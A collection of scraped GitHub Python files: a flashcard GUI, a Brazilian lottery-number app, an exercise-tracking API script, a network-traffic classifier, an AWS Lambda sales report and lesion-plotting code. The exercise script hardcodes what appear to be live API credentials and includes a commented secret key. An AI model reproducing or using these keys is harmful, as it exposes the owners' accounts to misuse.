\"8\"))\r\n fcPathBtn.grid(row = 1, column = 1, pady = (0,10), padx = (10,0))\r\n\r\n fcNextBtn = tk.Button(fcInfoFrm, text = \"Next >\", command = startCreation, font = (\"Courier New\", \"8\"), relief = \"solid\", bg = \"white\")\r\n fcNextBtn.pack(pady = 10, anchor = \"w\")\r\n root.mainloop()\r\n\r\ndef newFlashCards():\r\n createGUI()\r\n","repo_name":"henry50/flashcards","sub_path":"newFlash.py","file_name":"newFlash.py","file_ext":"py","file_size_in_byte":8963,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"71744787893","text":"'''\r\nCreated on 3 de jul de 2019\r\n\r\n@author: ANDY\r\n'''\r\n\r\nfrom PyQt5.QtCore import QUrl\r\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, qApp, QStatusBar,\\\r\n QFileDialog\r\n\r\nfrom loterias import *\r\nfrom loteriasWeb import *\r\nfrom gerarNumeros import gerarMega\r\nfrom gerarNumeros import gerarLoto\r\n\r\nimport loteriasLog\r\nimport loteriasDesenvolvedor\r\nimport PyQt5\r\n\r\nclass MyForm(QMainWindow):\r\n '''\r\n classdocs\r\n '''\r\n def __init__(self):\r\n '''\r\n Constructor\r\n '''\r\n super().__init__()\r\n self.ui = Ui_MainWindow()\r\n self.ui.setupUi(self) \r\n \r\n #self.statusbar = QStatusBar()\r\n self.ui.actionSair.triggered.connect(qApp.quit)\r\n \r\n \"\"\" Definindo e configurando os elementos da barra de menu \"\"\"\r\n \r\n ''' aba File '''\r\n # Definindo evento Abrir\r\n self.ui.actionAbrir.triggered.connect(self.actAbrir)\r\n \r\n # Definindo evento Salvar\r\n self.ui.actionSalvar.triggered.connect(self.actSalvar)\r\n \r\n ''' aba Opção '''\r\n # Definindo evento Jogar\r\n self.ui.actionJogar.triggered.connect(self.jogar)\r\n \r\n # Definindo evento Web\r\n self.ui.actionWeb.triggered.connect(self.web)\r\n \r\n # Definindo evento Apagar jogos\r\n self.ui.actionApagar_Jogos.triggered.connect(self.apagar)\r\n \r\n ''' aba About '''\r\n # Definindo evento sobre o dev\r\n self.ui.actionSobre_o_desenvolvedor.triggered.connect(self.sobredev)\r\n \r\n # Definindo evento Log\r\n self.ui.actionLog_de_Atualiza_es.triggered.connect(self.log)\r\n \r\n \"\"\" Definindo e configurando os pushs buttons da Mega Sena \"\"\"\r\n \r\n # Definindo push button jogar Mega sena\r\n self.ui.ButtonJogarMega.clicked.connect(self.jogar)\r\n \r\n # Definindo push button apagar jogos Mega sena\r\n self.ui.ButtonApagarMega.clicked.connect(self.apagar)\r\n \r\n # Definindo push button web Mega sena\r\n self.ui.ButtonWebMega.clicked.connect(self.web)\r\n \r\n \"\"\" 
Definindo e configurando os pushs buttons da LotoFacil \"\"\"\r\n \r\n # Definindo push button jogar Lotofácil\r\n self.ui.ButtonJogarLoto.clicked.connect(self.jogar)\r\n \r\n # Definindo push button apagar jogos Lotofácil\r\n self.ui.ButtonApagarLoto.clicked.connect(self.apagar)\r\n \r\n # Definindo push button web Lotofácil\r\n self.ui.ButtonWebLoto.clicked.connect(self.web)\r\n \r\n ###self.ui.tabWidget.currentTabName()\r\n \r\n # Definindo e imprimindo a data que consta no sistema\r\n date = QtCore.QDate.currentDate().toString('ddd dd-MM-yyyy') \r\n self.ui.labelDate.setText(date)\r\n \r\n # setting the timer\r\n timer = QtCore.QTimer(self)\r\n timer.timeout.connect(self.showlcd)\r\n timer.start(1000)\r\n self.showlcd()\r\n \r\n self.show()\r\n \r\n def showlcd(self):\r\n #esta função é chamada para mostrar o relógio\r\n \r\n time = QtCore.QTime.currentTime()\r\n text = time.toString('hh:mm:ss')\r\n self.ui.lcdNumber.display(text)\r\n \r\n def actAbrir(self):\r\n \"\"\" Esta função permite abrir um arquivo \"\"\"\r\n \r\n # a variavel self.ui.tabWidget.currentIndex() identifica a tab atual\r\n # onde 0 é mega , 1 lotofacil e assim por diante\r\n \r\n if self.ui.tabWidget.currentIndex() == 0:\r\n \r\n fname = QFileDialog.getOpenFileName(self, 'Abrir arquivo', '', 'Text Files (*.mega)')\r\n if fname[0]:\r\n \r\n with open(fname[0], 'r') as f:\r\n data = f.read()\r\n self.ui.textEditMega.setText(data)\r\n self.statusBar().showMessage(\"Arquivo aberto com sucesso!\", 5000)\r\n \r\n else:\r\n self.statusBar().showMessage(\"Nenhum arquivo aberto!\", 5000)\r\n \r\n elif self.ui.tabWidget.currentIndex() == 1:\r\n \r\n fname = QFileDialog.getOpenFileName(self, 'Abrir arquivo', '', 'Text Files (*.loto)')\r\n if fname[0]:\r\n \r\n with open(fname[0], 'r') as f:\r\n data = f.read()\r\n self.ui.textEditLoto.setText(data)\r\n self.statusBar().showMessage(\"Arquivo aberto com sucesso!\", 5000)\r\n \r\n else:\r\n self.statusBar().showMessage(\"Nenhum arquivo aberto!\", 5000)\r\n \r\n def actSalvar(self):\r\n \r\n if self.ui.tabWidget.currentIndex() == 0:\r\n \r\n if self.ui.textEditMega.toPlainText() == '': \r\n self.statusBar().showMessage(\"Nenhum jogo Mega sena a ser salvo!\", 5000)\r\n \r\n else: \r\n fileName, _ = QFileDialog.getSaveFileName(self,\"Save File\", \"\", \"Text File (*.mega)\") \r\n \r\n if fileName :\r\n with open(fileName, 'w') as f:\r\n data = self.ui.textEditMega.toPlainText()\r\n f.write(data)\r\n self.statusBar().showMessage(\"Jogo salvo com sucesso!\", 5000)\r\n else:\r\n self.statusBar().showMessage(\"Operação Salvar arquivo cancelada!\", 5000)\r\n \r\n elif self.ui.tabWidget.currentIndex() == 1:\r\n \r\n if self.ui.textEditLoto.toPlainText() == '': \r\n self.statusBar().showMessage(\"Nenhum jogo LotoFácil a ser salvo!\", 5000)\r\n \r\n else: \r\n fileName, _ = QFileDialog.getSaveFileName(self,\"Save File\", \"\", \"Text File (*.loto)\") \r\n \r\n if fileName :\r\n with open(fileName, 'w') as f:\r\n data = self.ui.textEditLoto.toPlainText()\r\n f.write(data)\r\n self.statusBar().showMessage(\"Jogo salvo com sucesso!\", 5000)\r\n else:\r\n self.statusBar().showMessage(\"Operação Salvar arquivo cancelada!\", 5000)\r\n \r\n def sobredev(self):\r\n self.dev = QtWidgets.QDialog()\r\n self.uiDev = loteriasDesenvolvedor.Ui_Dialog()\r\n self.uiDev.setupUi(self.dev)\r\n self.dev.show()\r\n \r\n def log(self):\r\n self.winLog = QtWidgets.QDialog()\r\n self.uiLog = loteriasLog.Ui_Dialog()\r\n self.uiLog.setupUi(self.winLog)\r\n \r\n #print(gerarMega())\r\n self.winLog.show()\r\n \r\n 
def jogar(self):\r\n \r\n if self.ui.tabWidget.currentIndex() == 0:\r\n \r\n aux = 0 \r\n somaMega = self.ui.spinBoxJogosMega.value() * 3.5\r\n if self.ui.spinBoxDezenasMega.value() == 7:\r\n somaMega = self.ui.spinBoxJogosMega.value() * 24.50\r\n if self.ui.spinBoxDezenasMega.value() == 8:\r\n somaMega = self.ui.spinBoxJogosMega.value() * 98\r\n if self.ui.spinBoxDezenasMega.value() == 9:\r\n somaMega = self.ui.spinBoxJogosMega.value() * 294\r\n if self.ui.spinBoxDezenasMega.value() == 10:\r\n somaMega = self.ui.spinBoxJogosMega.value() * 735\r\n if self.ui.spinBoxDezenasMega.value() == 11:\r\n somaMega = self.ui.spinBoxJogosMega.value() * 1617\r\n if self.ui.spinBoxDezenasMega.value() == 12:\r\n somaMega = self.ui.spinBoxJogosMega.value() * 3234\r\n if self.ui.spinBoxDezenasMega.value() == 13:\r\n somaMega = self.ui.spinBoxJogosMega.value() * 6006\r\n if self.ui.spinBoxDezenasMega.value() == 14:\r\n somaMega = self.ui.spinBoxJogosMega.value() * 10510.50\r\n if self.ui.spinBoxDezenasMega.value() == 15:\r\n somaMega = self.ui.spinBoxJogosMega.value() * 17517.50\r\n \r\n \r\n \r\n dezenasMega = self.ui.spinBoxDezenasMega.value()\r\n jogosMega = self.ui.spinBoxJogosMega.value()\r\n restrictMega = [self.ui.ListaMega1, self.ui.ListaMega2, self.ui.ListaMega3,\\\r\n self.ui.ListaMega4, self.ui.ListaMega5, self.ui.ListaMega6,\\\r\n self.ui.ListaMega7, self.ui.ListaMega8]\r\n resultadoMega = []\r\n \r\n # inicialização da variavel que vai contar o tempo\r\n tempoMega = QtCore.QTime()\r\n tempoMega.start()\r\n \r\n # gerando numeros aleatorios\r\n while jogosMega > 0:\r\n \r\n while dezenasMega > aux:\r\n \r\n aleat = gerarMega(restrictMega)\r\n \r\n while aleat in resultadoMega:\r\n aleat = gerarMega(restrictMega) \r\n \r\n resultadoMega.append(aleat)\r\n \r\n aux += 1\r\n \r\n # ordenando o resultado de forma crescente\r\n resultadoMega.sort()\r\n \r\n self.ui.textEditMega.append(' '.join(str(\"{:02d}\".format(num)) for num in resultadoMega))\r\n \r\n aux = 0\r\n \r\n resultadoMega.clear() \r\n jogosMega-=1\r\n tempoMega = tempoMega.elapsed() * 0.001\r\n \r\n self.statusBar().showMessage(\"jogo efetuado em : %0.3f s\" % tempoMega, 5000)\r\n self.ui.textEditMega.append('\\nValor do(s) Jogo(s): ' +str(somaMega)+' R$\\nFeito ' +self.ui.labelDate.text()+' às '\\\r\n +QtCore.QTime.currentTime().toString('hh:mm:ss')+ '\\n')\r\n \r\n for vMega in restrictMega:\r\n if vMega.isChecked():\r\n vMega.setAutoExclusive(False)\r\n vMega.setChecked(False)\r\n vMega.setAutoExclusive(True) \r\n \r\n elif self.ui.tabWidget.currentIndex() == 1:\r\n \r\n aux1 = 0\r\n \r\n somaLoto = self.ui.spinBoxJogosLoto.value() * 2\r\n if self.ui.spinBoxDezenasLoto.value() == 16:\r\n somaLoto = self.ui.spinBoxJogosLoto.value() * 32\r\n if self.ui.spinBoxDezenasLoto.value() == 17:\r\n somaLoto = self.ui.spinBoxJogosLoto.value() * 272\r\n if self.ui.spinBoxDezenasLoto.value() == 18:\r\n somaLoto = self.ui.spinBoxJogosLoto.value() * 1632\r\n \r\n dezenasLoto = self.ui.spinBoxDezenasLoto.value()\r\n jogosLoto = self.ui.spinBoxJogosLoto.value()\r\n restrictLoto = [self.ui.ListaLoto1, self.ui.ListaLoto2, self.ui.ListaLoto3,\\\r\n self.ui.ListaLoto4, self.ui.ListaMega5]\r\n resultadoLoto = []\r\n \r\n # inicialização da variavel que vai contar o tempo\r\n tempoLoto = QtCore.QTime()\r\n tempoLoto.start()\r\n \r\n # gerando numeros aleatorios\r\n while jogosLoto > 0:\r\n \r\n while dezenasLoto > aux1:\r\n \r\n aleat = gerarLoto(restrictLoto)\r\n \r\n while aleat in resultadoLoto:\r\n aleat = gerarLoto(restrictLoto)\r\n \r\n 
resultadoLoto.append(aleat)\r\n \r\n aux1 += 1\r\n \r\n # ordenando o resultado de forma crescente\r\n resultadoLoto.sort()\r\n \r\n self.ui.textEditLoto.append(' '.join(str(\"{:02d}\".format(num)) for num in resultadoLoto))\r\n aux1 = 0\r\n resultadoLoto.clear()\r\n \r\n jogosLoto-=1\r\n tempoLoto = tempoLoto.elapsed() * 0.001\r\n \r\n self.statusBar().showMessage(\"jogo efetuado em : %0.3f s\" % tempoLoto, 5000)\r\n self.ui.textEditLoto.append('\\nValor do(s) Jogo(s): ' +str(somaLoto)+' R$\\nFeito ' +self.ui.labelDate.text()+\\\r\n ' às '+QtCore.QTime.currentTime().toString('hh:mm:ss')+ '\\n')\r\n \r\n for vLoto in restrictLoto:\r\n if vLoto.isChecked():\r\n vLoto.setAutoExclusive(False)\r\n vLoto.setChecked(False)\r\n vLoto.setAutoExclusive(True)\r\n \r\n def apagar(self):\r\n \"\"\" Esta função o jogo efetuado\"\"\"\r\n \r\n if self.ui.tabWidget.currentIndex() == 0:\r\n \r\n if self.ui.textEditMega.toPlainText() == \"\":\r\n self.statusBar().showMessage(\"Nenhum jogo da Mega Sena ser apagado!\", 5000)\r\n else:\r\n self.ui.textEditMega.clear()\r\n self.statusBar().showMessage(\"Últimos jogos da Mega Sena apagados!\", 5000)\r\n \r\n elif self.ui.tabWidget.currentIndex() == 1:\r\n \r\n if self.ui.textEditLoto.toPlainText() == \"\":\r\n self.statusBar().showMessage(\"Nenhum jogo da LotoFácil ser apagado!\", 5000)\r\n else:\r\n self.ui.textEditLoto.clear()\r\n self.statusBar().showMessage(\"Últimos jogos da LotoFácil apagados!\", 5000)\r\n \r\n def web(self):\r\n \"\"\" Esta função abre uma nova janela com um navegador dentro\r\n lembrando que é necessário instanciar sempre todas as janela\r\n não importa se for do tipo Dialog, Widget ou MainWindow \"\"\"\r\n \r\n if self.ui.tabWidget.currentIndex() == 0:\r\n self.webMega = QtWidgets.QWidget()\r\n self.uiWebMega = Ui_Form()\r\n self.uiWebMega.setupUi(self.webMega)\r\n \r\n self.webMega.setWindowTitle(\"Resultado MEGA SENA\")\r\n \r\n # Configurando os butões do navegador\r\n self.uiWebMega.pushButtonBack.clicked.connect(self.uiWebMega.widget.back)\r\n self.uiWebMega.pushButtonReload.clicked.connect(self.uiWebMega.widget.reload)\r\n self.uiWebMega.pushButtonForward.clicked.connect(self.uiWebMega.widget.forward) \r\n \r\n # Configurando o link\r\n self.uiWebMega.widget.load(QUrl('http://www.loterias.caixa.gov.br/wps/portal/loterias/landing/megasena/'))\r\n self.statusBar().showMessage(\"Consulta Web Mega Sena processada com sucesso!\", 5000)\r\n \r\n self.webMega.show() \r\n \r\n elif self.ui.tabWidget.currentIndex() == 1:\r\n self.webLoto = QtWidgets.QWidget()\r\n self.uiWebLoto = Ui_Form()\r\n self.uiWebLoto.setupUi(self.webLoto)\r\n \r\n self.webLoto.setWindowTitle(\"Resultado LOTOFACIL\")\r\n \r\n # Configurando os butões do navegador\r\n self.uiWebLoto.pushButtonBack.clicked.connect(self.uiWebLoto.widget.back)\r\n self.uiWebLoto.pushButtonReload.clicked.connect(self.uiWebLoto.widget.reload)\r\n self.uiWebLoto.pushButtonForward.clicked.connect(self.uiWebLoto.widget.forward) \r\n \r\n # Configurando o link\r\n self.uiWebLoto.widget.load(QUrl('http://www.loterias.caixa.gov.br/wps/portal/loterias/landing/lotofacil/'))\r\n self.statusBar().showMessage(\"Consulta Web LotoFácil processada com sucesso!\", 5000)\r\n \r\n self.webLoto.show()\r\n \r\n \r\n ","repo_name":"detona115/Loterias","sub_path":"MyFormM.py","file_name":"MyFormM.py","file_ext":"py","file_size_in_byte":15669,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42005899836","text":"#---------------------------- EXERCISE 
TRACKING -----------------------#\nimport requests\n\nAPP_ID = \"ffc8ca90\"\nAPI_KEY = \"a09dafa569ae5130cac1f1e635301493\"\n\nheaders = {\n \"x-app-id\": APP_ID,\n \"x-app-key\": API_KEY\n }\n\nuser_input = input(\"Which exercise you did ?\")\n\nbody = {\n \"query\": user_input,\n \"gender\": \"female\",\n \"weight_kg\": 72.5,\n \"height_cm\": 167.64,\n \"age\": 30\n} \n\n\nend_point = f\"https://trackapi.nutritionix.com/v2/natural/exercise\"\n\nresponse = requests.post(end_point, headers=headers, json=body)\nresponse.raise_for_status()\ndata = response.json()\nprint(data)\n\n\n\n\n\n\n\n# open_api_key = \"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\"\n\n","repo_name":"MaRajpt/Abdullahs_Blogs","sub_path":"Angela_Udemy/Day38/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17141395931","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n@ use ANN to classify\n\nref: https://raw.githubusercontent.com/MorvanZhou/PyTorch-Tutorial/master/tutorial-contents/401_CNN.py\n\nDependencies:\n torch: 0.4\n torchvision\n matplotlib\n\n\"\"\"\nfrom collections import Counter\n\nimport numpy as np\nfrom sklearn.metrics import classification_report, confusion_matrix, accuracy_score\nfrom sklearn.preprocessing import OneHotEncoder\nfrom torch import optim\nfrom torch.autograd import Variable\n\nfrom utilities.preprocess import achieve_train_test_data, normalize_data, change_label, \\\n load_data_compute_mean\n\n__author__ = 'Learn_live'\n\n# library\n# standard library\n\n# third-party library\nimport torch\nimport torch.nn as nn\nimport torch.utils.data as Data\nimport matplotlib.pyplot as plt\n\nfrom sklearn.neural_network import MLPClassifier\n\n\nclass MLP():\n\n def __init__(self, *args, **kwargs):\n aplpha = 1\n self.epochs = kwargs['epochs']\n self.batch_size = kwargs['BATCH_SIZE']\n self.first_n_pkts = kwargs['first_n_pkts']\n self.out_size = kwargs['num_class']\n\n first_n_pkts = 10\n self.small_in_size = first_n_pkts\n self.small_h_size = 5\n self.small_out_size = 2\n self.clf = MLPClassifier(solver='sgd', alpha=1e-5, hidden_layer_sizes=(128, 64, 32, 16, 8), random_state=1,\n activation='tanh')\n\n def train(self, training_set):\n X = training_set[0]\n y = training_set[1]\n # pkts_x = X[:, 0:self.first_n_pkts]\n # flow_dur = X[:, self.first_n_pkts]\n # intr_x = X[:, self.first_n_pkts + 1:2 * self.first_n_pkts + 1]\n #\n # pkts_outputs = self.pkts_ann(pkts_x)\n # # flow_dur = flow_dur\n # intr_outputs = self.intr_tm_ann(intr_x)\n #\n # new_X = []\n # for i in range(len(X)):\n # lst_tmp = []\n # lst_tmp.append(flow_dur[i].input_data.tolist())\n # lst_tmp.extend(pkts_outputs[i].input_data.tolist())\n # lst_tmp.extend(intr_outputs[i].input_data.tolist())\n # new_X.append(lst_tmp)\n # # X = [pkts_outputs, flow_dur, intr_outputs]\n # new_X = torch.Tensor(new_X)\n # y_preds = self.classify_ann(new_X)\n # # _, y_preds=y_preds.input_data.max(dim=1) # get max value of each row\n #\n # return y_preds\n #\n self.clf.fit(X, y)\n\n def predict(self, X):\n # self.clf.predict([[2., 2.], [-1., -2.]])\n\n return self.clf.predict(X)\n\n def evaluate(self, Y, Y_preds):\n # cnt = 0\n # for i in range(len(Y)):\n # if Y[i] == Y_preds[i]:\n # cnt += 1\n # accuracy = cnt / len(Y)\n\n print(classification_report(Y, Y_preds))\n print(confusion_matrix(Y, Y_preds))\n\n return accuracy_score(Y, Y_preds)\n\n\ndef print_network(describe_str, net):\n num_params = 0\n for param in net.parameters():\n 
num_params += param.numel()\n print(describe_str, net)\n print('Total number of parameters: %d' % num_params)\n\n\nclass ANN(nn.Module):\n\n def __init__(self, *args, **kwargs):\n # super(ANN,self).__init__() # python 2.x\n super().__init__() # python 3.x\n\n self.epochs = kwargs['epochs']\n self.batch_size = kwargs['BATCH_SIZE']\n self.first_n_pkts = kwargs['first_n_pkts']\n self.out_size = kwargs['num_class']\n\n first_n_pkts = 10\n self.small_in_size = first_n_pkts\n self.small_h_size = 5\n self.small_out_size = 2\n\n self.pkts_ann = nn.Sequential(nn.Linear(self.small_in_size, self.small_h_size * 2), nn.Tanh(),\n nn.Linear(self.small_h_size * 2, self.small_h_size), nn.Tanh(),\n nn.Linear(self.small_h_size, self.small_out_size)\n )\n\n self.intr_tm_ann = nn.Sequential(nn.Linear(self.small_in_size, self.small_h_size * 2), nn.Tanh(),\n nn.Linear(self.small_h_size * 2, self.small_h_size), nn.Tanh(),\n nn.Linear(self.small_h_size, self.small_out_size)\n )\n\n self.in_size = 2 * self.small_out_size + 1 # first_n_pkts_list, flow_duration, intr_time_list\n self.h_size = 5\n # self.out_size = 1 # number of label, one-hot coding\n self.classify_ann = nn.Sequential(nn.Linear(self.in_size, self.h_size * 2), nn.Tanh(),\n nn.Linear(self.h_size * 2, self.h_size), nn.Tanh(),\n nn.Linear(self.h_size, self.out_size, nn.Softmax())\n )\n\n print('---------- Networks architecture -------------')\n print_network('pkts_ann:', self.pkts_ann)\n print_network('intr_tm_ann:', self.intr_tm_ann)\n print_network('classify_ann:', self.classify_ann)\n print('-----------------------------------------------')\n\n # self.criterion = nn.MSELoss(size_average=False)\n self.criterion = nn.MultiLabelMarginLoss()\n self.d_learning_rate = 1e-4\n self.g_learning_rate = 1e-4\n # self.optimizer = torch.optim.Adam(self.proposed_algorithms.parameters(), lr=self.learning_rate)\n # self.optimizer = optim.Adam([self.pkts_ann, self.intr_tm_ann, self.classify_ann], lr=self.d_learning_rate,\n # betas=(0.5, 0.9))\n params = list(self.pkts_ann.parameters()) + list(self.intr_tm_ann.parameters()) + list(\n self.classify_ann.parameters())\n self.optimizer = optim.Adam(params, lr=self.g_learning_rate, betas=(0.5, 0.9))\n\n def forward(self, X):\n pass\n\n def train(self, training_set):\n self.train_hist = {}\n self.train_hist['loss'] = []\n\n # dataset = Data.TensorDataset(torch.Tensor(training_set[0]), torch.Tensor(training_set[1])) # X, Y\n ### re divide dataset\n train_loader = Data.DataLoader(\n dataset=training_set, # torch TensorDataset format\n batch_size=self.batch_size, # mini batch size\n shuffle=True,\n num_workers=2,\n )\n for epoch in range(self.epochs):\n for step, (b_x, b_y) in enumerate(\n train_loader): # type: (int, (object, object)) # gives batch data, normalize x when iterate train_loader\n # print('step:',step, ', batchs:',int(len(dataset)/self.batch_size))\n b_x = Variable(b_x, requires_grad=True)\n # b_y = Variable(b_y.view(-1, 1))\n b_y = Variable(b_y.long())\n y_preds = self.forward(b_x)\n loss = self.criterion(y_preds, b_y) # net_outs, y_real(targets)\n\n self.optimizer.zero_grad() # clear gradients for this training step\n loss.backward() # backpropagation, compute gradients\n self.optimizer.step() # apply gradients\n\n self.train_hist['loss'].append(loss.data.tolist())\n if step % 100 == 0:\n print('epoch = %d, loss = %f' % (epoch, loss.data.tolist()))\n\n def predict(self, X):\n y_preds = self.forward(X)\n _, y_ = y_preds.data.max(dim=1, keepdim=False) # return max_value as predicted value\n\n # 
y_preds=y_preds.input_data.tolist()\n # y_=[]\n # for i in range(len(y_preds)):\n # if y_preds[i][0] > 0.5:\n # y_.append(1)\n # else:\n # y_.append(0)\n\n return y_.data.tolist()\n\n def evaluate(self, Y, Y_preds):\n cnt = 0\n for i in range(len(Y)):\n if Y[i] == Y_preds[i]:\n cnt += 1\n accuracy = cnt / len(Y)\n\n return accuracy\n\n\ndef show_figure(loss):\n data = list(loss)\n plt.plot(range(len(data)), data)\n plt.show()\n\n\ndef one_hot_sklearn(label_integer):\n label_integer = np.asarray(label_integer, dtype=int)\n onehot_encoder = OneHotEncoder(sparse=False)\n integer_encoded = label_integer.reshape(len(label_integer), 1)\n onehot_encoded = onehot_encoder.fit_transform(integer_encoded)\n\n return np.array(onehot_encoded, dtype=int)\n\n\nif __name__ == '__main__':\n torch.manual_seed(1) # reproducible\n\n input_file = '../results/AUDIO_first_n_pkts_10_all_in_one_file.txt'\n # X, Y = load_data(input_file)\n X, Y = load_data_compute_mean(input_file)\n X = normalize_data(np.asarray(X, dtype=float), range_value=[0, 1], eps=1e-5)\n Y = change_label(Y)\n X_train, X_test, y_train, y_test = achieve_train_test_data(X, Y, train_size=0.9, shuffle=True)\n\n ann = MLP(BATCH_SIZE=20, first_n_pkts=10, epochs=10, num_class=len(Counter(y_train)))\n # training_set = Data.TensorDataset(torch.Tensor(X_train), torch.Tensor(y_train)) # X, Y\n one_hot_y_train = one_hot_sklearn(y_train)\n training_set = (X_train, y_train)\n ann.train(training_set)\n\n # show_figure(ann.train_hist['loss'])\n\n Y_preds = ann.predict(X_train)\n print(Counter(Y_preds))\n acc = ann.evaluate(y_train, Y_preds)\n print('training accuracy:', acc)\n\n Y_preds = ann.predict(X_test)\n print(Counter(Y_preds))\n acc = ann.evaluate(y_test, Y_preds)\n print('testing accuracy:', acc)\n","repo_name":"kun0906/application_classification","sub_path":"histroyFiles/ANN-sklearn.py","file_name":"ANN-sklearn.py","file_ext":"py","file_size_in_byte":9246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19153351842","text":"import datetime\nimport os\n\nimport psycopg2\nimport ujson\n\n\ndef lambda_handler(event: dict, context: object) -> dict:\n result = get_report_for_date_range(\n event[\"queryStringParameters\"][\"date_from\"],\n event[\"queryStringParameters\"][\"date_to\"],\n )\n\n return {\n \"statusCode\": 200,\n \"body\": ujson.dumps(\n [\n {\n \"amount\": amount,\n \"currency\": currency,\n }\n for amount, currency in result\n ]\n ),\n }\n\n\ndef get_report_for_date_range(date_from: datetime.date, date_to: datetime.date) -> list:\n host = os.environ[\"RDS_HOST\"]\n port = os.environ[\"RDS_PORT\"]\n username = os.environ[\"RDS_USERNAME\"]\n password = os.environ[\"RDS_PASSWORD\"]\n\n conn = psycopg2.connect(\n host=host, port=port, database=\"postgres\", user=username, password=password\n )\n\n cursor = conn.cursor()\n cursor.execute(\n \"SELECT SUM(price), currency FROM orders WHERE created_at BETWEEN SYMMETRIC %s AND %s GROUP BY currency\",\n (\n date_from,\n date_to,\n ),\n )\n\n result = cursor.fetchall()\n\n conn.commit()\n cursor.close()\n conn.close()\n\n return result\n","repo_name":"sdarmofal/cloudier","sub_path":"src/reports/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"32850189027","text":"import os\nimport numpy as np\nfrom tqdm import tqdm\nfrom scipy.stats import norm\nimport matplotlib.pyplot as plt\n\n\ndef visualize_features(args, 
nn, layer_names, output_folder):\n dpi = 80.0\n imwidth = 224.0\n\n for layer in args.layers:\n weights, bias = nn.get_layerparams(layer)\n\n inds = range(weights.shape[0])\n nrows = np.ceil(np.sqrt(len(inds)))\n ncols = np.ceil(len(inds) / nrows)\n w = np.ceil((imwidth / dpi) * max(nrows, ncols))\n\n plt.figure(figsize=(w, w))\n for ui in tqdm(range(0, len(inds), 128), desc='Layer ' + layer):\n unitinds = inds[ui:(ui + 128)]\n ims = nn.visualize(None, layer, unitinds)\n ims = ims.transpose(0, 2, 3, 1)\n\n for i in range(ims.shape[0]):\n ax = plt.subplot(nrows, ncols, ui + i + 1)\n im = ims[i]\n im -= im.min()\n im /= im.max()\n\n if not os.path.exists(os.path.join(output_folder, layer_names[layer])):\n os.mkdir(os.path.join(output_folder, layer_names[layer]))\n plt.imsave(os.path.join(output_folder, layer_names[layer], '%04d.png' % (ui + i)), im)\n ax.imshow(im)\n ax.set_xticks([])\n ax.set_yticks([])\n\n plt.tight_layout()\n plt.savefig(os.path.join(output_folder, layer_names[layer] + '.png'))\n plt.close()\n\n\ndef plot_accuracies(filep, accuracies, labels, title, ylabel, xlabel):\n plt.figure()\n\n accuracies_mean = accuracies.mean(0)\n accuracies_std = accuracies.std(0)\n\n plt.plot(accuracies_mean[:, 0], label=labels[0])\n plt.plot(accuracies_mean[:, 1], label=labels[1])\n\n if accuracies.shape[0] > 1:\n plt.fill_between(range(accuracies_mean.shape[0]), accuracies_mean[:, 0] - accuracies_std[:, 0],\n accuracies_mean[:, 0] + accuracies_std[:, 0])\n plt.fill_between(range(accuracies_mean.shape[0]), accuracies_mean[:, 1] - accuracies_std[:, 1],\n accuracies_mean[:, 1] + accuracies_std[:, 1])\n\n # plt.plot((0, accuracies_mean.shape[0]), (accura\n # cies_mean[0, 0], accuracies_mean[0, 0]), 'b--', label='Unlesioned %s recognition'%args.categories[0])\n # plt.plot((0, accuracies_mean.shape[0]), (accuracies_mean[0, 1], accuracies_mean[0, 1]), 'g--', label='Unlesioned %s recognition'%args.categories[1])\n plt.ylabel(ylabel)\n plt.xlabel(xlabel)\n plt.title(title)\n plt.legend()\n plt.savefig(filep)\n plt.close()\n\n\ndef multiplot_accuracies(outputfilep, accuracies_by_experiment, layers, labels, p_threshold=1e-5):\n nexp = len(accuracies_by_experiment)\n nlayers = len(layers[0])\n plt.figure(figsize=(18, (nexp * 18.) 
/ nlayers))\n\n null_hypotheses = {}\n\n for k, accuracies_by_layer in enumerate(accuracies_by_experiment):\n for i, y in enumerate(accuracies_by_layer):\n y = y.squeeze()\n is_nullH = False\n\n if y.ndim == 3:\n y_std = y.std(0)\n y_mean = y.mean(0)\n y = y_mean\n is_nullH = True\n\n null_hypotheses[i] = (y_mean, y_std)\n\n layer = layers[k][i]\n ax = plt.subplot(nexp, 7, k * nlayers + i + 1)\n\n x = np.linspace(0, 1, y.shape[0])\n\n if is_nullH:\n ax.fill_between(x, y[:, 0] - y_std[:, 0], y[:, 0] + y_std[:, 0], alpha=0.5)\n ax.fill_between(x, y[:, 1] - y_std[:, 1], y[:, 1] + y_std[:, 1], alpha=0.5)\n\n plotsA = ax.plot(x, y[:, 0], label=labels[0])\n plotsB = ax.plot(x, y[:, 1], label=labels[1])\n\n # if not is_nullH and null_hypotheses[i] is not None:\n # y_mean, y_std = null_hypotheses[i]\n # ax.plot(x, 1.0 + y[:, 0] - y_mean[:, 0], color=plotsA[0].get_color())\n # ax.plot(x, 1.0 + y[:, 1] - y_mean[:, 1], color=plotsB[0].get_color())\n\n if not is_nullH and null_hypotheses[i] is not None:\n # mark x's that are significantly different from null hypothesis\n y_mean, y_std = null_hypotheses[i]\n pA = norm(y_mean[:, 0], y_std[:, 0]).pdf(y[:, 0])\n pB = norm(y_mean[:, 1], y_std[:, 1]).pdf(y[:, 1])\n\n sigA = pA < p_threshold\n sigB = pB < p_threshold\n\n pointsA = x[sigA]\n pointsB = x[sigB]\n\n ax.plot(pointsA, np.ones((pointsA.shape[0],)) + 0.06, '.', color=plotsA[0].get_color())\n ax.plot(pointsB, np.ones((pointsB.shape[0],)) + 0.03, '.', color=plotsB[0].get_color())\n\n if k == 0:\n plt.title(layer)\n if k < nexp - 1:\n ax.get_xaxis().set_ticks([])\n if i == 0 and k == nexp // 2:\n plt.ylabel('Top-1 Accuracy')\n elif k == nexp - 1 and i == nlayers // 2:\n plt.xlabel('Fraction of features removed')\n if i > 0:\n ax.get_yaxis().set_ticks([])\n if i == nlayers - 1 and k == nexp - 1:\n plt.legend(loc=3)\n plt.tight_layout()\n\n 